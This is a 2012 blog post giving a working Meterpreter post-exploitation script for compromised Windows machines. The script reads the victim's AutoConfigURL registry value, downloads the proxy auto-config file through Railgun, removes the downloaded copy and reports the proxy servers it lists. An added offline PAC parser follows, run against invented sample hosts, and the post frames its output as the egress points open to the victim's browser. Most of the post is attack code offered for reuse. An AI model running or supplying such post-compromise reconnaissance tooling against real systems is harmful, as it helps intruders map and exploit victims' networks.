
Sunday, 12 February 2012

Reading a proxy auto-config (PAC) file with Meterpreter

Since I am a web-security person (duh duh), please pardon me if you find this erroneous or useless.

The following Meterpreter script is an example of reading the proxy auto-config (PAC) file to find the proxy servers used by the compromised machine. It reads the AutoConfigURL value under HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings, downloads the file it points to with URLDownloadToFileW (called through Railgun), and then searches the downloaded file for PROXY directives. Two caveats: the value lives under HKCU, so it only reflects the settings of the user whose session Meterpreter is running in, and it says nothing about proxies configured through a static ProxyServer value or discovered by WPAD auto-detection.

Tested on Windows XP only.

#This is just a concept of reading pac file from the compromised machine.
#You can take the stuff ahead from here :-)
#oldmanlab@gmail.com

#Variable initialization
session = client

#Newer Meterpreter builds report the platform as 'windows' rather than 'win32'/'win64'
if session.platform =~ /win32|win64|windows/

  #Open the per-user Internet Settings key and read the AutoConfig URL.
  #The key path must be one string; a literal line break inside it will never match.
  open_key = session.sys.registry.open_key(HKEY_CURRENT_USER,
             'Software\Microsoft\Windows\CurrentVersion\Internet Settings', KEY_READ)
  begin
    url = open_key.query_value('AutoConfigURL').data
  rescue ::Exception
    #query_value raises when the value is absent, i.e. no PAC is configured
    url = nil
  ensure
    open_key.close
  end

  if url.nil? || url.empty?
    print_status('No pac file configured (AutoConfigURL not set)')
  else
    print_status("Reading pac file from #{url} .....")

    #Download the pac file with URLDownloadToFileW via Railgun.
    #pCaller and lpfnCB are passed as NULL pointers, so LPVOID 'in' is the right Railgun type.
    session.railgun.add_dll('urlmon', 'urlmon')
    session.railgun.add_function('urlmon', 'URLDownloadToFileW', 'DWORD',
      [['LPVOID', 'pCaller', 'in'], ['PWCHAR', 'szURL', 'in'],
       ['PWCHAR', 'szFileName', 'in'], ['DWORD', 'dwReserved', 'in'],
       ['LPVOID', 'lpfnCB', 'in']])
    #The file is written to the current directory of the process Meterpreter lives in
    pac_path = 'proxy.pac'
    result = session.railgun.urlmon.URLDownloadToFileW(nil, url, pac_path, 0, nil)

    #URLDownloadToFileW returns an HRESULT; 0 (S_OK) means the download succeeded
    if result['return'] != 0
      print_status("Download failed, HRESULT 0x#{result['return'].to_s(16)}")
    else
      #Read the file and search for the proxy servers
      proxy_data = ''
      temp = session.fs.file.new(pac_path, 'rb')
      until temp.eof?
        proxy_data << temp.read
      end
      temp.close
      #Remove the downloaded copy so it is not left behind on disk
      session.fs.file.rm(pac_path)

      #A PAC can return several "PROXY host:port; ..." entries, so collect all of them
      #instead of taking a single greedy match (which also blew up with NoMethodError on nil)
      proxy_hosts = proxy_data.scan(/PROXY\s+([^;"]+)/).flatten.map(&:strip).uniq
      if proxy_hosts.empty?
        print_status('No PROXY directives found in the pac file (DIRECT only?)')
      else
        proxy_hosts.each { |h| print_status('The proxy server is: ' + h) }
      end
    end
  end
else
  print_status('Victim is not using Windows')
end

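The weak spot in the script above is the regex that pulls the proxy out of the PAC: a real PAC has several return paths, each of which can list PROXY, HTTPS, SOCKS and DIRECT entries in fallback order, and it may mention "PROXY" inside a comment. The following stand-alone parser is an added example, not code from the original post; it runs offline against a constructed sample PAC (the hostnames, addresses and ports are made up) and shows how to extract every directive from every return statement rather than just the first match.

```ruby
# Added example (not from the original post): parse the proxy strings that a PAC
# file's FindProxyForURL() can return. Runs offline on a constructed sample PAC.

# Constructed sample PAC; hosts, addresses and ports are invented for the example.
SAMPLE_PAC = <<~'PAC'
  function FindProxyForURL(url, host) {
    // internal hosts go straight out
    if (isPlainHostName(host) || dnsDomainIs(host, ".corp.example"))
      return "DIRECT";
    if (url.substring(0, 6) == "https:")
      return "HTTPS secure-gw.corp.example:8443; PROXY 10.0.0.5:3128";
    // PROXY in a comment must be ignored: "PROXY decoy:1"
    return "PROXY 10.0.0.5:3128; PROXY 10.0.0.6:3128; SOCKS5 socks.corp.example:1080; DIRECT";
  }
PAC

# Directive keywords defined by the PAC format.
PROXY_TYPES = %w[PROXY HTTPS SOCKS SOCKS4 SOCKS5 DIRECT].freeze

# Strip JavaScript comments so a "PROXY ..." string inside a comment is not picked up.
# Heuristic, not a JS tokenizer: a "//" preceded by ':' (as in "http://") is left alone.
def strip_js_comments(src)
  src.gsub(%r{/\*.*?\*/}m, '').gsub(%r{(?<!:)//[^\n]*}, '')
end

# Split one return value ("PROXY a:1; SOCKS5 b:2; DIRECT") into a list of hashes,
# preserving the order, which is the fallback order the browser will try.
def parse_proxy_string(str)
  str.split(';').map(&:strip).reject(&:empty?).map do |entry|
    type, endpoint = entry.split(/\s+/, 2)
    type = type.upcase
    next nil unless PROXY_TYPES.include?(type)
    if type == 'DIRECT'
      { type: 'DIRECT' }
    else
      host, port = endpoint.to_s.split(':', 2)
      { type: type, host: host, port: (port ? port.to_i : nil) }
    end
  end.compact
end

# Every string literal returned by FindProxyForURL, each parsed into its directives.
def extract_proxies(pac_source)
  cleaned = strip_js_comments(pac_source)
  cleaned.scan(/return\s+"([^"]*)"/).flatten.map { |s| parse_proxy_string(s) }
end

# Unique "TYPE host:port" endpoints across all return paths, excluding DIRECT.
def proxy_endpoints(pac_source)
  extract_proxies(pac_source).flatten
    .reject { |d| d[:type] == 'DIRECT' }
    .map { |d| "#{d[:type]} #{d[:host]}:#{d[:port]}" }
    .uniq
end

if __FILE__ == $PROGRAM_NAME
  proxy_endpoints(SAMPLE_PAC).each { |e| puts e }
end
```

Feeding `proxy_data` from the Meterpreter script into `proxy_endpoints` instead of a single regex gives the full list of egress points the victim's browser can use, including SOCKS and HTTPS proxies that the original `PROXY` match would miss. The return-statement scan only catches string literals; a PAC that builds its result from variables or concatenation would need a real JavaScript engine to evaluate.
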
I never coded in Ruby before, so any suggestions are welcome.